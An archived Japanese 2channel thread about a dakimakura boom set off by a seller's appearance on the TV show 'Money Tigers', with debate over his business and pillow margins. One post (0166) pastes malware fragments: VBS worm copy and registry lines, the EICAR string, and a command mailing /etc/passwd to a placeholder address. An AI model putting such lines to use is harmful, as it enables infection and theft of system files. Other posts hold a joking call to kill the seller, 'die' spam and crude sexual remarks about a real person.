【ちゃんこ】抱き枕ブーム到来!!【増田】
■ このスレッドは過去ログ倉庫に格納されています
0001最後尾の名無しさん@3日目02/09/08 03:31ID:rHfiPpkp
先日のちゃんこ増田出演による「マネーの虎」の反響のせいか
各抱き枕通販サイトは注文が殺到していると言う。
これは2chを中心とした抱き枕ブームの到来とも言えるのでは無いだろうか。
抱き枕業界の売り上げは前年比より45%も飛躍して上昇する見込みだ。
(ロリター)

▼チャンコとゆかいな仲魔たち〜トップページ〜
http://www.tctv.ne.jp/members/chanko/top.html

▼ピロウドリーム(抱き枕、クッション、その他取り扱い)
http://www.p80.co.jp/p/p.htm

▼Yahoo!オークション検索結果
http://search.auctions.yahoo.co.jp/search?sb=desc&desc=%CA%FA%A4%AD%CB%ED&alocale=0jp&acc=jp
00022ゲット?02/09/08 03:39ID:???
なぁ、なんでこいつ「ちゃんこ」って言われてるんだ?
0003最後尾の名無しさん@3日目02/09/08 03:48ID:rHfiPpkp
>>2
デブだから

ファミ通編集者の時のニックネーム
0006最後尾の名無しさん@3日目02/09/08 04:07ID:2YxkR8iT
ちゃんこスレ関連スレを色々探して見回ってるんだが、
「ピロウドリーム」ってとこは結構まともな商売してるよう
だね。やりかたもうまいと思う。
こういうとこのやつなら虎も金出しそうだ。
0007最後尾の名無しさん@3日目02/09/08 04:08ID:2YxkR8iT
ちゃんこスレ関連スレってなんじゃ(;´Д`)
ちゃんこ関連スレね。
0009よいしょ、よいしょ、よいしょ、よいしょ02/09/08 04:47ID:0WOocHfA
ここまでやったのですから、せめて500百万円くらいは出して欲しかったですね。
http://parkcgi.zero.ad.jp/~zbe03934/updir/img20020906212124.jpg
0010最後尾の名無しさん@3日目02/09/08 12:27ID:???
一人暮らしだったら迷わず買っていたが、
親と同居している以上買うわけにはいかないな・・・。
0011秋葉チェキ! p0906-ip01hodogaya.kanagawa.ocn.ne.jp02/09/08 17:00ID:???
俺も親と同居だが、抱き枕カバーくらいなら買っても大丈夫っしょ。

ホントは、アリスソフトの会報に載ってた岳画殺たん等身大フィギュア
とかが欲しいんだけど、さすがに、置く場所が無いんで無理だわ・・・。
0012最後尾の名無しさん@3日目02/09/08 20:57ID:???
たまたま虎見てたら出て驚いたが、ただ単に見世物にされただけって感じがする。
誰も金出さないんだもんな。

宣伝にはなったからいいか
0013最後尾の名無しさん@3日目02/09/08 22:49ID:???
だが今回の増田氏の行動はこの業界にかなり深刻なダメージを
与えることになるのであった・・・(ガーン
0014最後尾の名無しさん@3日目02/09/12 02:56ID:Qu+8BIaM
HPのBBS読んでマジギレしたよ…
なんなんだよ!!!コイツは!!!!!!!!!

>別に何謝罪はいっさいする気がないので、その手の糾弾は無視します。
>悪いと思っていないから。
>悪評立つのは覚悟の上でプレゼンしただけと思っている。

貴様が山奥で一人で生活して外界から接触を断ってるなら文句ね―よ、
だがな、ふざけてんじゃねーぞ!!
周りのことも考えないで好き放題、TV局にピエロにされやがって…
コイツ見てると「オタクは自分の感情を最優先させる人」って言われても
なんにも言えねーな…
0016最後尾の名無しさん@3日目02/09/12 06:48ID:nLwuTaWN

ちゃんこの掲示板から。
マスターマークの書き込みなので本人です!
http://www.kodama.com/bbssys/default.asp?bbs=chanko&tno=0146

>>75:たこさん
>あらら、同じ自営業かつ経営者の方ですか。
>まわりにも自営の人がいないので、なかなか切り盛りを実感して
>いただけないのがこまりものでした。
>虎の平均視聴率が全国ネットで15%ですから1800万人が視聴した
>ワケです。その0.01%がヒットしただけでも1800枚ですから、
>十分ペイできると宣伝になったわけです。
>これがなんでみんなわからないのか不思議でして……。
>ご声援ありがとうございます。

>現在1000万の借金を返済中でして、やっと2割ほど返しました

やっぱりチャンコは確信犯だった!ヤシは頭が良いぞ!
でも、すげぇムカつく!誰かチャンコを殺って下さい!
0017最後尾の名無しさん@3日目02/09/12 23:46ID:fpwNHFE7

      : : .:、":    : : ..: : `.-'、、:        
     丶:    : : : : : .  : : : : : : `:        
    :     : : :.,,,_,、丶:`-  .,,,,,,_、、      
    :   ,,r‐'': : : {,wぇ=|‐!,,rs,,`,,、     
    .‐,,、'"、    `-,,,、,,┘  ゙ ̄`,,,_     
    .と: ヒ :       .イ'ニハiiぃ ̄  ゙l     
    .″: レ'        .,,,',ニ,、、    |    よいしょっ よいしょっ 
    'L:        ゙'''",“゙゚“'゙'・・   l     よいしょっ よいしょっ
    .″         ゙゚"``゜ : 、  .,!        よいしょっ よいしょっ
    .‐       .ェ       .`:  .7     
     丶         ~'...ri、,,,,,,xl": : : ,i´     
     `、       : ``````: : : :_,i″     
     .、: 丶    : : : : : : : : : : .,,rl″      
    : :    :         : 、"`"


0020最後尾の名無しさん@3日目02/09/13 17:48ID:chRFW7pC
>>18

すげえ、このラブピローって奴
女優の形通りに切り抜いてあるしホールやローションもついてる。
さらには本人のビデオもついて3000円?

…ちゃんこ、どうやってもおまえには勝てねえよ(笑)
0021最後尾の名無しさん@3日目02/09/13 18:54ID:Jai5rHkH
>>20
つーかちゃんこのやろうとしてた事まんま、、、
0022最後尾の名無しさん@3日目02/09/13 20:07ID:9Y65f84A
帝京大OB織田無道逮捕、宗教法人乗っ取り図る
http://headlines.yahoo.co.jp/hl?a=20020911-00000505-yom-soci

織田無道タイーホ!!!
http://news3.2ch.net/test/read.cgi/news/1031700010/
帝京大学の過去の犯罪特集・1
http://choco.2ch.net/news/kako/1015/10154/1015445145.html
帝京大学の話はここでしろや
http://tmp.2ch.net/test/read.cgi/joke/1027010892/
帝京大生とイカどっちが役にたつの??
http://school.2ch.net/test/read.cgi/campus/1030814548/
@速報@【帝京は糞!】が改めて定説になりました
http://tmp.2ch.net/test/read.cgi/joke/1024909882/
【その2】疑惑の総合大学 帝京大学・八王子キャンパス【その2】
http://kanto.machibbs.com/bbs/read.pl?BBS=tama&KEY=1031242402
0024秋葉チェキ! p6069-ip02hodogaya.kanagawa.ocn.ne.jp02/09/14 12:30ID:LqnbFAb8
そのラブピローとかゆーのは、浮き輪みたいな材質で
空気で膨らますタイプなハズなので、抱き枕のほうが
抱き心地は良さげだけど、抱き枕より、値段が安いんで、
お気に入りなゲーム・アニメ系作品のキャラのがあるなら欲しいかも・・・。
0025最後尾の名無しさん@3日目02/09/14 12:46ID:3WfVssNW
このヴァカ、まだ儲ける気でいます。
マネ虎本はもとより、ここでは物を買わないように。

>>名前: チャンコ増田  2002/09/14 05:05  [fw.tctv.ne.jp]
>>>30
>>やはり誤解を解くには、残りの5/6などの事実関係を明らかにした
>>「マネーの虎」本を出すしかないと思っております。
0027:最後尾の名無しさん@3日目02/09/14 13:58ID:j+5eUFBV
>>26

買えば良いんじゃないの?
別におまけにチャンコ本人付いて来る訳じゃなし
0028最後尾の名無しさん@3日目02/09/14 14:04ID:Ckm5E3Ko
おまけはちゃんこの腋汁1リットルです。
0032最後尾の名無しさん@3日目02/09/14 15:30ID:j+5eUFBV
>>30

なるほど。
とすると、今度は内気そうなかわいい娘仕込んで、魔ねーの虎に乗りこませ
れば、売上倍増って事だな(w
0035最後尾の名無しさん@3日目02/09/15 21:20ID:4ooO0/sm
>>24
アニキャラとかじゃないけどアニメ絵のラブピローなら売ってるよ。
たしか中村錦が描いてたハズ。大人のコンビニ・立○店でそれをみつけた。
もしかしたら秋葉原店にもあるかも?
0037最後尾の名無しさん@3日目02/09/16 13:57ID:omQVbppy
>36
うん、キレイなIDやね(w

まあそれはさておき、沈静化してきた今に思えば、何故に
チャンコ氏はあそこまで「抱き枕」にこだわるのか疑問。
そんなに儲かるもんなのか?抱き枕って??
0038秋葉チェキ! p4126-ip02hodogaya.kanagawa.ocn.ne.jp02/09/16 18:23ID:fIQAluZo
>>35
芳賀書店とかで売ってるのを見た事あるけどあの絵では全然ダメダメです・・・。
みつみ美里とか門井亜矢あたりが描いたエロ絵の抱き枕キボンヌ。

>>37
やっぱ利幅が一番デカイからじゃない?
表・裏あわせて、イラストを2枚依頼するだけで、8000円で売れる訳だから。
下敷きやテレカじゃ、そうはイカンもの。
00393602/09/16 18:54ID:okPBAfUt
うーん…抱き枕って、そんなに利幅が出るモンなの?
いや、利幅はともかく、そんなに売れるモンなのかなー?

今回の虎騒ぎで初めてチャンコ氏のHPやらサークルやら知ったけど、
あんだけ色んなグッズ作ってんなら、抱き枕に固執する事ないんじゃ
ないかなー…と。それが純粋に疑問。
0041エセ批評家 ◆fRiFbzuI 02/09/16 18:59ID:qZvOKfyZ
本人も語っていたが

『作りたいから作る』

他のグッズじゃ満たされないんだろ
精神混濁で目を血走らせている秋葉豚にはわからん事だろうが…
0042秋葉チェキ! p4126-ip02hodogaya.kanagawa.ocn.ne.jp02/09/16 19:33ID:fIQAluZo
プッ、アレがそんな純情なタマな訳なかろうに・・・。

>>39
他のグッズにしたって、そんなに数は売れないんじゃない?
ヲタ相手の商売ってのは、少数のコアでディープなマニアを相手に
いかに単価の高いモノを売る事が出来るかってのが基本中の基本。
薄利多売するほどの市場規模はないから、その意味で、抱き枕は
ヲタ向け商売の原則に非常に忠実であると言える。
0046最後尾の名無しさん@3日目02/09/16 21:33ID:a1aHp9k0
>45
「作りたい」より「それ売って儲けたい」だろ。チャンコは。
でなきゃ放送で虎に「アンタもヲタだろ?」って言われて、
「そういう要素は多分にあると思います」なんて逃げ道作らんだろ。
0048最後尾の名無しさん@3日目02/09/16 23:39ID:eJReF/ab
↑ワラタ
0049エセ批評家 ◆fRiFbzuI 02/09/16 23:52ID:qZvOKfyZ
創作意欲が純情か金儲けかの二択にはならんよ

カーマイソ先生だったり、ちゃんこだったり忙しいな、俺w
0050最後尾の名無しさん@3日目02/09/16 23:57ID:ocr0KiAr
さすが似非だな揚げ
0052最後尾の名無しさん@3日目02/09/17 11:18ID:v6ciDb01
>エセ批評家氏
>秋葉チェキ!

アンタら煽り合ってる様でいて、実は仲が良いんじゃねーか?
0054最後尾の名無しさん@3日目02/09/17 15:44ID:/v94Bdzs
昔同人抱き枕を作ったことあるけど
普通に造ったらコストかかりすぎるのよあれは
うちはこだわりすぎて「ちゃんこ」のとこのやつより、
生地も印刷(正確には染め)もかなりいいの使ってしまったので
8000円で売っても一個あたりの利益1000円もなかったよ。
でもその甲斐あって買ってくれた人からは絶賛の嵐でしたけどね。
でも2度と造る気なくなりましたよ・・・
なんだったらうちでやった原価表の詳しいの載せようか?
0055エセ批評家 ◆fRiFbzuI 02/09/17 16:03ID:tCb3JPsg
>52
時々議論が成立するダケ

>54
狭い世界だ、一発で身元が割れるぞ

作家からイラスト二枚受け取れば商品を作れるとはいえ
金儲けの材料としては優れているとは言いがたいと思うがなぁ

TVで言った事は単なる見栄で
本心としては使いたい、作りたいというのがあるんじゃないかと……

まぁ、抱き枕とは疎遠どころか絶縁してる俺にゃ、抱きマクラーの気持ちがわからんのかもしれんがね
0056最後尾の名無しさん@3日目02/09/17 22:19ID:M+gflnqY
単なる長方形枕じゃなくって、凹凸が計算されてて
ちゃんと抱きつける形になってる枕があるんだけど
こういうの専用のカバーとか誰か作って。
0057最後尾の名無しさん@3日目02/09/18 04:25ID:w+1nds/F
>56
そのデコボコってさ、どんな体形のデコボコなん?
ロリキャラなら、すとーんと長方形でもいいんじゃない?
まあ、俺も抱きマクラーじゃないんでどっちでもいいんだけど。

しかし「抱きマクラー」ってのは…まんまだなコリャ(www
0058最後尾の名無しさん@3日目02/09/18 19:13ID:P570KhuN
秋葉チェキvsエセ批評家の豚バトルが見れるのはこのスレッドだけ!
0061最後尾の名無しさん@3日目02/09/20 14:51ID:W9C/rMB0
抱き枕自体はいくつか持ってるが、
性器丸出しの露骨な抱き枕は狩ってもさすがに使えないので勘弁して欲しいな。
もし今から手に入るならば欲しいものは、
『胸キュンちより&チカ@ユニゾン』とか『とらハちか&みお@メッセ』とか。
00634.33.91.15402/10/28 20:10ID:Ue2ufNJ8
>>203
心美キ*・゜゚・*:.。..。.:*・゜(||;´Д`)゚・*:.。. .。.:*・゜゚・*モ・・・
006466.149.27.3402/10/28 20:11ID:xM5e+4b5
Sさんて誰よ?
0065最後尾の名無しさん@3日目03/01/16 06:38ID:PWdATEGk
ハナゲ
0066山崎渉03/01/17 16:44ID:xjyJftk5
(^^)
0071最後尾の名無しさん@3日目03/02/18 12:20ID:xHH68X5V
某誌で「マネーの虎」出てたときの写真が載ってたけど、
セリオの抱き枕を使ってたのか…。
セリオ好きのオレとしては複雑。
0072最後尾の名無しさん@3日目03/03/01 12:47ID:cISCxHi/
マネーの虎みてねー
誰か見せて
0074最後尾の名無しさん@3日目03/03/03 17:28ID:wULUuJuG
Sさんて誰よ?
0084山崎 渉03/04/20 04:16ID:EzMcfr/I
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0088山崎 渉03/05/28 13:27ID:jONgEJhc
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
0090最後尾の名無しさん@3日目03/05/29 07:25ID:U+VSZIzh
      / ̄ ̄ ̄ ̄ ̄ ̄\
    /          \
   /                 ヽ
    l:::::::::               | 
    |::::::::::   (●)    (●)   |  
   |:::::::::::::::::   \___/    |
    ヽ:::::::::::::::::::.  \/     ノ 
0091最後尾の名無しさん@3日目03/05/29 07:26ID:U+VSZIzh
      / ̄ ̄ ̄ ̄ ̄ ̄\
    /            \
   /                 ヽ
    l:::::::::               | 
    |::::::::::   (●)    (●)   |  
   |:::::::::::::::::   \___/    |
    ヽ:::::::::::::::::::.  \/     ノ 
0095最後尾の名無しさん@3日目03/06/25 14:48ID:uBctf5EJ
ちゃんこage
0097最後尾の名無しさん@3日目03/07/06 16:18ID:S/o36n9u


0100最後尾の名無しさん@3日目03/07/07 04:19ID:5l6/VlaC
100げt
0104最後尾の名無しさん@3日目03/07/08 20:55ID:+3mgYLrc

0105最後尾の名無しさん@3日目03/07/11 18:23ID:9jbCQfwk
抱きage
0106最後尾の名無しさん@3日目03/07/12 16:09ID:5B/frI5e
外道復活age
0107わむて ◆WAMUTEuPBU 03/07/13 13:38ID:aT5c9Uqv


从 ヽ-、
゚ - ゚从

                        ――  、
                    , ´         ` \
                  /             \
                 /                ヽ
                /                  ヽ
               |                   |
               |         わ         |
               |          む         |
               |         て         |
                ヽ                   /
                ゝ                  /
                 ヽ                /
                  \             /
                    `‐  ___  ‐ ´
                            

从 ヽ-、
゚ - ゚从

0114最後尾の名無しさん@3日目04/02/04 03:12ID:hMlQGugz
ちゃんこって最近何してんのか?
0116最後尾の名無しさん@3日目04/02/10 05:03ID:5E13Km+w
オタクイズビューティフル
0117最後尾の名無しさん@3日目04/02/10 14:06ID:n40/zhbK


ヨイショ ヨイショ ヨイショ ヨイショ


0119最後尾の名無しさん@3日目04/04/11 11:27ID:VTMxScD+


ヨイショ ヨイショ ヨイショ ヨイショ



0121最後尾の名無しさん@3日目04/05/24 19:58ID:Iott+DzG
コナミの偽抱き枕販売の男に賠償命令 商標権侵害で
ttp://www.asahi.com/national/update/0524/027.html

>裁判で男性側は「違法とは思わなかった。パロディー品と明記して販売した」
>と反論していたが、認められなかった。

グッズ厨はよく読んでおくように。
0122最後尾の名無しさん@3日目04/05/31 04:38ID:hifkuM13
ちゃんこの思う壺
0124最後尾の名無しさん@3日目04/06/01 18:29ID:4INv5cfk
チャンコは自分のやったことがどれだけ同族の(ジャンルは問わず)
世間の風当たりを強めたのか…全く反省の色が無い!!!
とくに探偵のあのインタビューはなんだっ!!!
なにが予想通り祭りだ!ふざけるなアホ!!
貴様は面白いかもしれんが、俺は親に「アンタ、こんなことしてないでしょうね?」って言われたり
いやっ!俺はまだいい!俺の知り合いのガンヲタは留守中、親に部屋を家捜しされる始末!
おいチャンコ!!!!!!!!!

正直、
人 と し て 恥 を 知 っ て 欲 し い 。
0125最後尾の名無しさん@3日目04/06/03 16:08ID:wBrTl0Gn
欲 し い
0126最後尾の名無しさん@3日目04/06/14 10:30ID:shVniHz/
誘導
【抱き枕で】エロゲ寝具総合スレ【ハァハァ】
ttp://pie.bbspink.com/test/read.cgi/erog/1081266899/l50
手前みそ工房の抱き枕カバーとかって…4枚目
ttp://comic4.2ch.net/test/read.cgi/sakura/1061712246/l50
0127最後尾の名無しさん@3日目04/08/08 17:08ID:ytYt4LWi
買うか買わないか迷った買え!―――断腸の銘
                                 ミ [七尾奈留座右の銘]
                              パラリ…
0132最後尾の名無しさん@3日目04/08/26 02:59ID:f8pbS4pY
☆☆☆☆☆幸福のレス☆☆☆☆☆
このレスを見たアナタは1週間後に彼女が出来、とってもステキな人生が送れます。
ただしこのレスを地下スレにageで10以上貼り付けなければ
あなたは一生、恋人とは縁のない寂しい人生を送ることになるでしょう。
(☆.。.:*・°☆.。.:*・°.☆.。.:*・°
0133最後尾の名無しさん@3日目04/08/26 10:00ID:rfnpyBtX
☆☆☆☆☆幸福のレス☆☆☆☆☆
このレスを見たアナタは1週間後に彼女が出来、とってもステキな人生が送れます。
ただしこのレスを地下スレにageで10以上貼り付けなければ
あなたは一生、恋人とは縁のない寂しい人生を送ることになるでしょう。
(☆.。.:*・°☆.。.:*・°.☆.。.:*・°
0135最後尾の名無しさん@3日目04/10/23 11:26:44ID:c1k2iXgh
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉


0136最後尾の名無しさん@3日目04/11/22 15:19:53ID:35hKWNKq
ヽ(`Д´)ノボッキアゲ
0137最後尾の名無しさん@3日目05/01/30 22:04:12ID:pqSmwjwt
流行ってるのか?
0138最後尾の名無しさん@3日目05/02/11 16:45:09ID:REwsW2US
んなわけない
0139最後尾の名無しさん@3日目05/03/14 21:27:28ID:B7jARwv0
ちゃんこをせせら笑っていた虎は新・日曜美術館を見て今どう思うのだろう・・・・・・



見てるわけないかラーメン屋やごみ拾い風情がwww
0140最後尾の名無しさん@3日目2005/04/08(金) 16:00:49ID:zCFv8uF0
すげ長寿スレ
0141最後尾の名無しさん@3日目2005/04/28(木) 17:07:19ID:aJmODVJ8
2年ぶりの更新あげ
0144最後尾の名無しさん@3日目2005/09/24(土) 03:57:03ID:/jDYaaaJ
 ∧||∧
(  ⌒ ヽ 鬱だ吊ろう……。
 ∪  ノ  
  ∪∪
0145アノミー ◆oqnPLS3ufk 2005/10/02(日) 02:38:47ID:hlfhMoc7
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね僕以外の全人類死ね
0146最後尾の名無しさん@3日目2005/10/02(日) 04:36:18ID:zHdn4JpB
 ┌─────────┐
 │                  |
 │    ハァハァ警報!  │
 │                  |
 └―――──――――┘
      ヽ(´д`) ノ
         (  へ)
          く
0147最後尾の名無しさん@3日目2005/10/02(日) 05:54:58ID:BY7FeH5A
抱き枕買うよ
0148最後尾の名無しさん@3日目2005/10/02(日) 23:51:02ID:zHdn4JpB
 ┌─────────┐
 │                  |
 │    ハァハァ警報!  │
 │                  |
 └―――──――――┘
      ヽ(´д`) ノ
         (  へ)
          く

0149最後尾の名無しさん@3日目2005/10/03(月) 03:23:50ID:8uY+YdDn
チャンコ鍋
0152最後尾の名無しさん@3日目2005/12/15(木) 02:52:11ID:8GEukUjU
〃∩ ∧_∧
⊂⌒(´^?u^?`) はいはいコワスコワス
 `ヽ_っ⌒/⌒c
     ⌒ ⌒
0154アノミー ◆oqnPLS3ufk 2005/12/31(土) 21:43:06ID:sJeanlAl
>>153
射れるぞおwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ずんずんずんずんずんwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
おらおらおらまだ逝かないぞwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
0155最後尾の名無しさん@3日目2006/01/02(月) 13:31:48ID:8D3fLiiP
24歳で仲根かすみたんのおまんこゲットした和田は世界でも5本の指に入る勝ち組。
子供は多ければ多いほどいいとか言ってたから毎日が中田氏祭りだろうな。
かすみたんも至高の笑顔で会見してたし(プゲラ
0156最後尾の名無しさん@3日目2006/03/22(水) 16:40:02ID:Crb575+p
 正直、抱き枕はいらないけど等身大の顔の表情が欲しいのです。
外から帰ってきて僻みに凝り固まった所を、寝床脇に添えてある取り外した液晶画面の中から穏やかな表情で見つめられながら幸せに眠りたいのです。枕だと発光しないし。
 それでdlsite.comで康臣技巧さんのcg集を全部買ったはいいけど、抱き枕cgだけに限って等身大に顔を拡大すると画像の劣化ノイズで
ヒゲが生えてるように見えてしまうのですorz。まあ利用方法が稀なのかもしれませんが。
 個人的には容量も値段ももっと高くてもいいですから皆様方どうか画質を優先してくださいorz
0157最後尾の名無しさん@3日目2006/03/25(土) 11:53:29ID:A4bq1xIU
256 : :2006/03/25(土) 00:50:19 HOST:softbank219186060035.bbtec.net
0158最後尾の名無しさん@3日目2006/04/17(月) 17:57:31ID:+zXY0/sP
良すれ
0160最後尾の名無しさん@3日目2006/05/31(水) 23:24:09ID:PFBQ/lR1
太ってるから?
0162最後尾の名無しさん@3日目2006/07/18(火) 15:26:45ID:u00DH9f7
ちゃんこや〜カムバックうううううううう
0166最後尾の名無しさん@3日目2006/10/30(月) 18:27:20ID:48YXVAXJ
なにこの化石スレ
> Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
> <object data="ms-its:mhtml:file://C:\\MAIN.MHT!
> X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
> fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
> ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
> G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
> "avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> cat /etc/passwd | mail nobody@nonexistent.com
> c.Copy(dirwin&"\Win32DLL.vbs")
0167http:// softbank218127150204.bbtec.net.2ch.net/2006/11/07(火) 12:30:37ID:1ktGPcLP
guest guest

0168最後尾の名無しさん@3日目2007/01/27(土) 02:52:26ID:ESf3FGNr
どんだけ過疎ってるんだよ
0170最後尾の名無しさん@3日目2007/06/27(水) 01:30:19ID:IST0cRA+
まだがんばっているみたいだな。
新作はフェイトのライダーさんとかだそうだ。

http://www.dakimakura.net/#rider
0175最後尾の名無しさん@3日目2008/08/09(土) 17:06:26ID:ycydmM5O
マネーの虎でひどい扱いだったが先見の明だけはあったよな
見た目がまずかった
0176最後尾の名無しさん@3日目2008/09/19(金) 22:35:24ID:yyovjpEM
太田光さんに殺人予告 脅迫容疑で埼玉の男逮捕
http://www.daily.co.jp/newsflash/2008/07/27/0001272924.shtml

 警視庁杉並署は二十七日までに、インターネットの掲示板にお笑いコンビ爆笑問題の太田光さんを殺すなどと書き込んだとして脅迫容疑で、
埼玉県上尾市上尾村一〇一一ノ四七、無職小沢史人容疑者(32)を逮捕した。

 小沢容疑者は、太田さんがテレビの番組で、ネットでの殺人予告を批判する趣旨の発言をしていたことを知り「逆に太田さんに対し(殺人予告
を)書き込んでやろうと思った。殺すつもりはなくユーモアのつもりだった」と話しているという。

 調べでは、小沢容疑者は八日午後一時前、自宅のパソコンから2ちゃんねる掲示板に「爆笑問題の太田光を殺します。包丁で刺し殺します。
ご期待ください。これは犯行予告だ」などと書き込み、脅迫した疑い。

 掲示板を見た人が通報し発覚。十二日、太田さんが杉並署に被害届を出し、同署がIPアドレスなどから割り出した。
0177最後尾の名無しさん@3日目2009/08/11(火) 15:20:19ID:QpRn7MPg
   /二__,--、r'"___、 ヾト、.ヽ
レ'"~,-,、 !  ! ' '" ̄ .ノ\ヾ:、
K/ー'~^~_/  ヽミ:ー‐‐'"  ヽ i
!〉ー―'"( o ⊂! ' ヽ  ∪ Y」_   /
i ∪  ,.:::二二ニ:::.、.      l 、... | バブン!バブン!
!    :r'エ┴┴'ーダ ∪   ! !l< キュルキュキュキュ!
.i、  .  ヾ=、__./      ト=.  | ブゥオオオオ〜ン!!
ヽ 、∪   ― .ノ     .,!    \   (排便音)
0178最後尾の名無しさん@3日目2009/10/25(日) 14:54:16ID:m6MEQBLM
このスレ立てたの7年前かwww
0179最後尾の名無しさん@3日目2010/01/17(日) 00:44:46ID:pAdIZCab
あの当時は全部無許可で作ってたから散々叩かれてたな
儲けれると解って今は公認が多いけど
0180最後尾の名無しさん@3日目2010/09/02(木) 15:34:57ID:OZ8eqfcj
過疎ってんなあ
0181最後尾の名無しさん@3日目2010/11/25(木) 20:05:18ID:SAywzDsB
「穹ちゃんの萌え萌えハァハァ抱き枕カバー」再販ハァハァ……
0183最後尾の名無しさん@3日目2011/06/16(木) 02:00:10.66ID:36pxjeMD
浮上
0184最後尾の名無しさん@3日目2012/10/09(火) 21:50:04.63ID:ZjzGChNT
抱き枕サイト「仕事を辞めてやる」の人、どないしたんやろ。
0185最後尾の名無しさん@3日目2013/11/28(木) 02:51:31.79ID:GxeRmFTY
マネーの虎の動画見た。
増田氏、今何してるんだろう。
是非審査員経営者を見返してやって欲しい
0187最後尾の名無しさん@3日目2016/02/12(金) 15:40:33.35ID:bU3PlzXo
すさまじいスレだな
0189自治スレでワッチョイ再導入議論中2018/03/17(土) 23:35:56.34ID:XkaxzP/M
ob
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況